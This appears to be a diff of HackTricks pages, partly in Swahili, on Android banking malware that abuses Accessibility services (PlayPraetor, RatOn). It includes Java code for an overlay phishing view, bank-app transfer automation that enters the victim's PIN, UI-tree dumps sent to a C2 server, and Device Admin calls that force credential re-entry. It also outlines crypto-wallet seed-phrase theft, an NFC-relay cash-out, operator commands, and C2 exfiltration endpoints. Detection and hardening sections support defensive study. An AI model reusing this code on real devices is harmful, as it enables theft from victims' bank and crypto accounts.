- Low-bandwidth: mara kwa mara toa dump ya Accessibility node tree, serialize maandishi/roles/bounds yanayoonekana na uyatumie kwa C2 kama pseudo-screen (amri kama `txt_screen` mara moja na `screen_live` kuendelea).
|
||||
- High-fidelity: omesha MediaProjection na anzisha screen-casting/recording kwa mahitaji (amri kama `display` / `record`).
|
||||
|
||||
### ATS playbook (bank app automation)
|
||||
Kutolewa kazi ya JSON, fungua app ya banki, endesha UI kupitia Accessibility kwa mchanganyiko wa maswali ya maandishi na kugusa kwa kuratibu, na ingiza PIN ya malipo ya mhasiriwa wakati unapofikiwa kuomba.
|
||||
|
||||
Mfano wa kazi:
|
||||
```json
|
||||
{
|
||||
"cmd": "transfer",
|
||||
"receiver_address": "ACME s.r.o.",
|
||||
"account": "123456789/0100",
|
||||
"amount": "24500.00",
|
||||
"name": "ACME"
|
||||
}
|
||||
```
|
||||
Mifano ya maandishi yaliyoonekana katika mtiririko mmoja wa lengo (CZ → EN):
|
||||
- "Nová platba" → "Malipo mapya"
|
||||
- "Zadat platbu" → "Ingiza malipo"
|
||||
- "Nový příjemce" → "Mpokeaji mpya"
|
||||
- "Domácí číslo účtu" → "Nambari ya akaunti ya ndani"
|
||||
- "Další" → "Ifuatayo"
|
||||
- "Odeslat" → "Tuma"
|
||||
- "Ano, pokračovat" → "Ndiyo, endelea"
|
||||
- "Zaplatit" → "Lipa"
|
||||
- "Hotovo" → "Imekamilika"
|
||||
|
||||
Waendeshaji pia wanaweza kuangalia/kuongeza vizingiti vya uhamisho kupitia amri kama `check_limit` na `limit` ambazo zinaelekeza kwenye UI ya vizingiti kwa njia sawa.
|
||||
|
||||
### Crypto wallet seed extraction
|
||||
Malengo kama MetaMask, Trust Wallet, Blockchain.com, Phantom. Mtiririko: fungua (PIN iliyopelewa au nywila iliyotolewa), nenda kwenye Security/Recovery, funua/onyesha seed phrase, keylog/exfiltrate it. Tekeleza locale-aware selectors (EN/RU/CZ/SK) ili kusawazisha urambazaji kati ya lugha.
|
||||
|
||||
### Device Admin coercion
|
||||
Device Admin APIs zinatumika kuongeza fursa za kunasa PIN na kumkasirisha mhusika:
|
||||
|
||||
- Kufunga mara moja:
|
||||
```java
|
||||
dpm.lockNow();
|
||||
```
|
||||
- Sababisha uthibitisho uliopo uishe ili kulazimisha kubadilisha (Accessibility inakamata PIN/nenosiri mpya):
|
||||
```java
|
||||
dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner
|
||||
```
|
||||
- Lazimisha ufunguaji usiotumia biometria kwa kuzima vipengele vya biometria vya keyguard:
|
||||
```java
|
||||
dpm.setKeyguardDisabledFeatures(admin,
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);
|
||||
```
|
||||
Kumbuka: Mifumo mingi ya DevicePolicyManager inahitaji Device Owner/Profile Owner kwenye Android za hivi karibuni; baadhi ya builds za OEM zinaweza kuwa na udhaifu. Daima thibitisha kwenye OS/OEM lengwa.
|
||||
|
||||
### NFC relay orchestration (NFSkate)
|
||||
Stage-3 inaweza kusakinisha na kuanzisha module ya nje ya NFC-relay (mfano, NFSkate) na hata kumpa kiolezo cha HTML kumwongoza mwathiriwa wakati wa relay. Hii inawezesha contactless card-present cash-out pamoja na ATS mtandaoni.
|
||||
|
||||
Muktadha: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay).
|
||||
|
||||
### Operator command set (sample)
|
||||
- UI/state: `txt_screen`, `screen_live`, `display`, `record`
|
||||
- Social: `send_push`, `Facebook`, `WhatsApp`
|
||||
- Overlays: `overlay` (inline HTML), `block` (URL), `block_off`, `access_tint`
|
||||
- Wallets: `metamask`, `trust`, `blockchain`, `phantom`
|
||||
- ATS: `transfer`, `check_limit`, `limit`
|
||||
- Device: `lock`, `expire_password`, `disable_keyguard`, `home`, `back`, `recents`, `power`, `touch`, `swipe`, `keypad`, `tint`, `sound_mode`, `set_sound`
|
||||
- Comms/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact`
|
||||
- NFC: `nfs`, `nfs_inject`
|
||||
|
||||
### Mawazo ya kugundua & ulinzi (mtindo wa RatOn)
|
||||
- Tafuta WebViews zenye `addJavascriptInterface()` zinazoonyesha njia za installer/permission; kurasa zinazoisha kwa “/access” zinazochochea prompts za Accessibility.
|
||||
- Toa tahadhari kwa apps zinazozalisha mwendo wa juu wa vitendo/vibonye vya Accessibility muda mfupi baada ya huduma kupewa ruhusa; telemetry inayofanana na Accessibility node dumps ikitumwa kwa C2.
|
||||
- Angalia mabadiliko ya sera za Device Admin katika apps zisizotumika: `lockNow`, kuisha kwa password, kugeuza vipengele vya keyguard.
|
||||
- Taarifu kuhusu prompts za MediaProjection kutoka kwa apps zisizo za kampuni na kufuatiliwa na uplodi za fremu kwa vipindi.
|
||||
- Gundua usakinishaji/kuanzishwa kwa app ya nje ya NFC-relay iliyoamshwa na app nyingine.
|
||||
- Kwa benki: itekeleze uthibitisho wa nje-ya-bandwidth, kufunga kwa biometrics, na mipaka ya miamala isiyoweza kupitishwa na uendeshaji wa kiotomatiki kwenye kifaa.
|
||||
|
||||
## References
|
||||
|
||||
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
|
||||
- [Luban – Android image compression library](https://github.com/Curzibn/Luban)
|
||||
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
|
||||
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
|
||||
- [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
|
||||
- [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -2,23 +2,23 @@
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Overview
|
||||
## Muhtasari
|
||||
|
||||
`AccessibilityService` iliumbwa kusaidia watumiaji wenye ulemavu kuingiliana na vifaa vya Android. Kwa bahati mbaya, APIs hizi za **automatisering yenye nguvu** (urambazaji wa kimataifa, uandishi wa maandiko, usambazaji wa ishara, madirisha ya overlay…) zinaweza kutumika na malware kupata **udhibiti kamili wa mbali** wa simu _bila ruhusa za root_.
|
||||
`AccessibilityService` iliumbwa kusaidia watumiaji wenye ulemavu kuingiliana na vifaa vya Android. Kwa bahati mbaya, ile ile **powerful automation APIs** (global navigation, text input, gesture dispatch, overlay windows…) zinaweza kutumiwa na malware kupata **complete remote control** ya kifaa _without root privileges_.
|
||||
|
||||
Trojan za benki za kisasa za Android na Trojan za Upatikanaji wa Mbali (RATs) kama **PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda** na wengine wengi wanafuata mapishi sawa:
|
||||
Trojans za kisasa za benki za Android na Remote-Access-Trojans (RATs) kama **PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda** na zingine nyingi hufuata taratibu zile zile:
|
||||
|
||||
1. Mtu wa kijamii amshawishi mwathirika kuwezesha huduma ya upatikanaji isiyo halali (ruhusa ya *BIND_ACCESSIBILITY_SERVICE* inachukuliwa kuwa "hatari kubwa" na inahitaji hatua wazi kutoka kwa mtumiaji).
|
||||
2. Tumia huduma hiyo ili
|
||||
* kukamata kila tukio la UI na maandiko yanayoonekana kwenye skrini,
|
||||
* kuingiza ishara za bandia (`dispatchGesture`) na vitendo vya kimataifa (`performGlobalAction`) ili automatishe kazi yoyote anayotaka opereta,
|
||||
* kuchora overlays za skrini nzima juu ya programu halali kwa kutumia aina ya dirisha **TYPE_ACCESSIBILITY_OVERLAY** (hakuna onyo la `SYSTEM_ALERT_WINDOW`!),
|
||||
* kimya kimya kutoa ruhusa za ziada za wakati wa kukimbia kwa kubofya kwenye mazungumzo ya mfumo kwa niaba ya mwathirika.
|
||||
3. Kutolea data au kufanya **On-Device-Fraud (ODF)** kwa wakati halisi wakati mtumiaji anatazama skrini ambayo ni ya kawaida kabisa.
|
||||
1. Social-engineer mwathirika ili aweze kuwasha rogue accessibility service (uruhusa *BIND_ACCESSIBILITY_SERVICE* unachukuliwa kuwa "high-risk" na unahitaji hatua ya wazi ya mtumiaji).
|
||||
2. Tumia service hiyo ili
|
||||
* capture kila tukio la UI na maandishi yanayoonekana kwenye skrini,
|
||||
* inject synthetic gestures (`dispatchGesture`) na global actions (`performGlobalAction`) ili ku-automate kazi yoyote inayotaka operator,
|
||||
* draw full-screen overlays juu ya apps halali kwa kutumia window type **TYPE_ACCESSIBILITY_OVERLAY** (hakuna sehemu ya `SYSTEM_ALERT_WINDOW` inayoonekana!),
|
||||
* silently grant ruhusa za runtime za ziada kwa kubofya dialog za mfumo kwa niaba ya mwathirika.
|
||||
3. Exfiltrate data au kufanya **On-Device-Fraud (ODF)** kwa wakati halisi huku mtumiaji akiangalia skrini inayonekana kawaida kabisa.
|
||||
|
||||
---
|
||||
|
||||
## Requesting the permission
|
||||
## Kuomba ruhusa
|
||||
```xml
|
||||
<!-- AndroidManifest.xml -->
|
||||
<service
|
||||
@ -34,7 +34,7 @@ android:exported="false">
|
||||
android:resource="@xml/evil_accessibility_config"/>
|
||||
</service>
|
||||
```
|
||||
XML ya mshirika inaelezea jinsi mazungumzo ya uwongo yatakavyokuwa:
|
||||
XML ya mwenzake inaelezea jinsi dirisha la mazungumzo la bandia litakavyoonekana:
|
||||
```xml
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
|
||||
@ -47,7 +47,7 @@ android:canRetrieveWindowContent="true"/>
|
||||
```
|
||||
---
|
||||
|
||||
## Msingi wa automatisering ya UI ya mbali
|
||||
## Misingi ya uendeshaji otomatiki wa UI kwa mbali
|
||||
```java
|
||||
public class EvilService extends AccessibilityService {
|
||||
@Override
|
||||
@ -68,17 +68,17 @@ dispatchGesture(new GestureDescription.Builder().addStroke(s).build(), null, nul
|
||||
}
|
||||
}
|
||||
```
|
||||
Kwa kutumia APIs hizi mbili tu, mshambuliaji anaweza:
|
||||
* Kufungua skrini, kufungua programu ya benki, kuhamasisha mti wa UI wake na kuwasilisha fomu ya uhamisho.
|
||||
* Kukubali kila sanduku la ruhusa linalojitokeza.
|
||||
* Kuweka/update APK za ziada kupitia dhamira ya Play Store.
|
||||
Kwa kutumia API hizi mbili tu mshambuliaji anaweza:
|
||||
* Fungua skrini, fungua app ya benki, pita kupitia UI tree yake na tuma fomu ya uhamisho.
|
||||
* Kubali kila dialogi ya ruhusa inayojitokeza.
|
||||
* Sakinisha/sasisha APK za ziada kupitia Play Store intent.
|
||||
|
||||
---
|
||||
|
||||
## Mifumo ya Unyanyasaji
|
||||
## Mifano ya matumizi mabaya
|
||||
|
||||
### 1. Ulaghai wa Overlay (Kukusanya Taarifa za Utambulisho)
|
||||
`WebView` ya uwazi au isiyo ya uwazi inaongezwa kwenye meneja wa dirisha:
|
||||
### 1. Overlay Phishing (Credential Harvesting)
|
||||
A transparent or opaque `WebView` is added to the window manager:
|
||||
```java
|
||||
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
|
||||
MATCH_PARENT, MATCH_PARENT,
|
||||
@ -87,59 +87,146 @@ FLAG_NOT_FOCUSABLE | FLAG_NOT_TOUCH_MODAL, // touches still reach the real
|
||||
PixelFormat.TRANSLUCENT);
|
||||
wm.addView(phishingView, lp);
|
||||
```
|
||||
Mtu waathirika anaandika taarifa za kuingia kwenye fomu ya uwongo wakati programu ya nyuma inapokea ishara hizo hizo – hakuna onyo la "draw over other apps" linaloonekana.
|
||||
The victim types credentials into the fake form while the background app receives the same gestures – no suspicious "draw over other apps" prompt is ever shown.
|
||||
|
||||
> Mfano wa kina: sehemu ya *Accessibility Overlay Phishing* ndani ya ukurasa wa Tapjacking.
|
||||
> Detailed example: the *Accessibility Overlay Phishing* section inside the Tapjacking page.
|
||||
|
||||
### 2. Uhalifu wa Otomatiki kwenye Kifaa
|
||||
Familia za malware kama **PlayPraetor** zinaweka channel ya WebSocket inayodumu ambapo opereta anaweza kutoa amri za kiwango cha juu (`init`, `update`, `alert_arr`, `report_list`, …). Huduma hiyo inatafsiri amri hizo kuwa ishara za kiwango cha chini hapo juu, ikifanikisha shughuli zisizoidhinishwa za wakati halisi ambazo kwa urahisi hupita uthibitishaji wa hatua nyingi uliofungwa kwa kifaa hicho.
|
||||
### 2. On-Device Fraud automation
|
||||
Malware families such as **PlayPraetor** maintain a persistent WebSocket channel where the operator can issue high-level commands (`init`, `update`, `alert_arr`, `report_list`, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor-authentication tied to that very device.
|
||||
|
||||
### 3. Utiririshaji wa Skrini & Ufuatiliaji
|
||||
Kwa kuunganisha **MediaProjection API** na maktaba ya mteja wa RTMP, RAT inaweza kutangaza framebuffer ya moja kwa moja kwa `rtmp://<c2>:1935/live/<device_id>`, ikimpa mpinzani ufahamu kamili wa hali wakati injini ya Accessibility inasababisha UI.
|
||||
### 3. Screen streaming & monitoring
|
||||
By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://<c2>:1935/live/<device_id>`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.
|
||||
|
||||
---
|
||||
|
||||
## PlayPraetor – mtiririko wa amri & udhibiti
|
||||
## PlayPraetor – command & control workflow
|
||||
|
||||
1. **HTTP(S) heartbeat** – piga duru kwenye orodha iliyoandikwa kwa mkono hadi kikoa kimoja kijibu `POST /app/searchPackageName` na C2 inayofanya kazi.
|
||||
2. **WebSocket (bandari 8282)** – amri za JSON za pande mbili:
|
||||
* `update` – peleka mipangilio mipya/APKs
|
||||
* `alert_arr` – tengeneza templeti za overlay
|
||||
* `report_list` – tuma orodha ya majina ya pakiti yaliyolengwa
|
||||
1. **HTTP(S) heartbeat** – iterate over a hard-coded list until one domain answers `POST /app/searchPackageName` with the active C2.
|
||||
2. **WebSocket (port 8282)** – bidirectional JSON commands:
|
||||
* `update` – push new conf/APKs
|
||||
* `alert_arr` – configure overlay templates
|
||||
* `report_list` – send list of targeted package names
|
||||
* `heartbeat_web` – keep-alive
|
||||
3. **RTMP (bandari 1935)** – utiririshaji wa skrini/video wa moja kwa moja.
|
||||
3. **RTMP (port 1935)** – live screen/video streaming.
|
||||
4. **REST exfiltration** –
|
||||
* `/app/saveDevice` (alama ya kidole)
|
||||
* `/app/saveDevice` (fingerprint)
|
||||
* `/app/saveContacts` | `/app/saveSms` | `/app/uploadImageBase64`
|
||||
* `/app/saveCardPwd` (taarifa za benki)
|
||||
* `/app/saveCardPwd` (bank creds)
|
||||
|
||||
**AccessibilityService** ni injini ya ndani inayogeuza amri hizo za wingu kuwa mwingiliano wa kimwili.
|
||||
The **AccessibilityService** is the local engine that turns those cloud commands into physical interactions.
|
||||
|
||||
---
|
||||
|
||||
## Kugundua huduma za upatikanaji zenye uharibifu
|
||||
## Detecting malicious accessibility services
|
||||
|
||||
* `adb shell settings get secure enabled_accessibility_services`
|
||||
* Mipangilio → Upatikanaji → *Huduma zilizopakuliwa* – angalia programu ambazo **sio** kutoka Google Play.
|
||||
* Mifumo ya MDM / EMM inaweza kutekeleza `ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY` (Android 13+) kuzuia huduma zilizopakuliwa.
|
||||
* Changanua huduma zinazofanya kazi:
|
||||
* Settings → Accessibility → *Downloaded services* – angalia programu ambazo **sio** kutoka Google Play.
|
||||
* MDM / EMM solutions can enforce `ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY` (Android 13+) to block sideloaded services.
|
||||
* Analyse running services:
|
||||
```bash
|
||||
adb shell dumpsys accessibility | grep "Accessibility Service"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Mapendekezo ya kuimarisha kwa waendelezaji wa programu
|
||||
## Hardening recommendations for app developers
|
||||
|
||||
* Alama maoni nyeti kwa `android:accessibilityDataSensitive="accessibilityDataPrivateYes"` (API 34+).
|
||||
* Changanya `setFilterTouchesWhenObscured(true)` na `FLAG_SECURE` ili kuzuia utekaji wa tap/overlay.
|
||||
* Gundua overlays kwa kupiga kura `WindowManager.getDefaultDisplay().getFlags()` au API ya `ViewRootImpl`.
|
||||
* Kata kufanya kazi wakati `Settings.canDrawOverlays()` **au** huduma ya Upatikanaji isiyoaminika inafanya kazi.
|
||||
* Mark sensitive views with `android:accessibilityDataSensitive="accessibilityDataPrivateYes"` (API 34+).
|
||||
* Combine `setFilterTouchesWhenObscured(true)` with `FLAG_SECURE` to prevent tap/overlay hijacking.
|
||||
* Detect overlays by polling `WindowManager.getDefaultDisplay().getFlags()` or the `ViewRootImpl` API.
|
||||
* Refuse to operate when `Settings.canDrawOverlays()` **or** a non-trusted Accessibility service is active.
|
||||
|
||||
---
|
||||
|
||||
## Marejeleo
|
||||
## ATS automation cheat-sheet (Accessibility-driven)
|
||||
Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
|
||||
```java
|
||||
// Helpers inside your AccessibilityService
|
||||
private List<AccessibilityNodeInfo> byText(String t){
|
||||
AccessibilityNodeInfo r = getRootInActiveWindow();
|
||||
return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
|
||||
}
|
||||
private boolean clickText(String t){
|
||||
for (AccessibilityNodeInfo n: byText(t)){
|
||||
if (n.isClickable()) return n.performAction(ACTION_CLICK);
|
||||
AccessibilityNodeInfo p = n.getParent();
|
||||
if (p != null) return p.performAction(ACTION_CLICK);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
private void inputText(AccessibilityNodeInfo field, String text){
|
||||
Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
|
||||
field.performAction(ACTION_SET_TEXT, b);
|
||||
}
|
||||
private void tap(float x, float y){
|
||||
Path p = new Path(); p.moveTo(x,y);
|
||||
dispatchGesture(new GestureDescription.Builder()
|
||||
.addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
|
||||
}
|
||||
```
|
||||
Mfano wa mtiririko (Czech → English labels):
|
||||
- "Nová platba" (Malipo mapya) → bonyeza
|
||||
- "Zadat platbu" (Weka malipo) → bonyeza
|
||||
- "Nový příjemce" (Mpokeaji mpya) → bonyeza
|
||||
- "Domácí číslo účtu" (Nambari ya akaunti ya ndani) → zingatia and `ACTION_SET_TEXT`
|
||||
- "Další" (Ifuatayo) → bonyeza → … "Zaplatit" (Lipa) → bonyeza → ingiza PIN
|
||||
|
||||
Mbinu ya dharura: kuratibu zilizowekwa (hard-coded) kwa `dispatchGesture` wakati utafutaji wa maandishi unashindwa kutokana na widgets maalum.
|
||||
|
||||
Imeonekana pia: hatua za awali za `check_limit` na `limit` kwa kuvinjari kiolesura cha mipaka na kuongeza mipaka ya kila siku kabla ya uhamisho.
|
||||
|
||||
## Utoaji wa skrini bandia unaotegemea maandishi
|
||||
Kwa udhibiti wa mbali wenye latency ndogo, badala ya mtiririko kamili wa video, tengeneza uwakilishi wa maandishi wa mti wa UI wa sasa na uitume kwa C2 kwa mfululizo.
|
||||
```java
|
||||
private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
|
||||
if (n==null) return;
|
||||
Rect b = new Rect(); n.getBoundsInScreen(b);
|
||||
CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
|
||||
sb.append(indent).append("[").append(cls).append("] ")
|
||||
.append(txt==null?"":txt).append(" ")
|
||||
.append(b.toShortString()).append("\n");
|
||||
for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+" ", sb);
|
||||
}
|
||||
```
|
||||
Hii ni msingi wa amri kama `txt_screen` (za mara moja) na `screen_live` (zinazoendelea).
|
||||
|
||||
## Misingi ya kulazimisha Device Admin
|
||||
Mara tu Device Admin receiver inapowezeshwa, miito hii inaongeza fursa za kunasa credentials na kudumisha udhibiti:
|
||||
```java
|
||||
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
|
||||
ComponentName admin = new ComponentName(this, AdminReceiver.class);
|
||||
|
||||
// 1) Immediate lock
|
||||
dpm.lockNow();
|
||||
|
||||
// 2) Force credential change (expire current PIN/password)
|
||||
dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android
|
||||
|
||||
// 3) Disable biometric unlock to force PIN/pattern entry
|
||||
int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
|
||||
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
|
||||
dpm.setKeyguardDisabledFeatures(admin, flags);
|
||||
```
|
||||
Kumbuka: upatikanaji halisi wa sera hizi hutofautiana kulingana na toleo la Android na OEM; thibitisha device policy role (admin vs owner) wakati wa upimaji.
|
||||
|
||||
## Mifumo ya uchimbaji wa seed-phrase za pochi za Crypto
|
||||
Mtiririko uliobainika kwa MetaMask, Trust Wallet, Blockchain.com na Phantom:
|
||||
- Fungua kwa kutumia PIN iliyodukuliwa (iliyorekodiwa kupitia overlay/Accessibility) au nenosiri la pochi lililotolewa.
|
||||
- Sogelea: Settings → Security/Recovery → Reveal/Show recovery phrase.
|
||||
- Chukua phrase kupitia keylogging ya text nodes, secure-screen bypass, au screenshot OCR wakati maandishi yamefichika.
|
||||
- Saidia maeneo mengi (EN/RU/CZ/SK) ili kusawazisha selectors – pendelea `viewIdResourceName` inapopatikana, vinginevyo tumia ulinganishaji wa maandishi wa lugha nyingi.
|
||||
|
||||
## Uendeshaji wa NFC-relay
|
||||
Moduli za Accessibility/RAT zinaweza kusakinisha na kuanzisha app maalum ya NFC-relay (e.g., NFSkate) kama hatua ya tatu na hata kuingiza mwongozo wa overlay ili kumuelekeza mwathirika kupitia hatua za relay za kadi zilizopo.
|
||||
|
||||
Historia na TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
|
||||
|
||||
---
|
||||
|
||||
## Marejeo
|
||||
* [PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT](https://www.cleafy.com/cleafy-labs/playpraetors-evolving-threat-how-chinese-speaking-actors-globally-scale-an-android-rat)
|
||||
* [Android accessibility documentation – Automating UI interaction](https://developer.android.com/guide/topics/ui/accessibility/service)
|
||||
* [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
|
||||
* [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|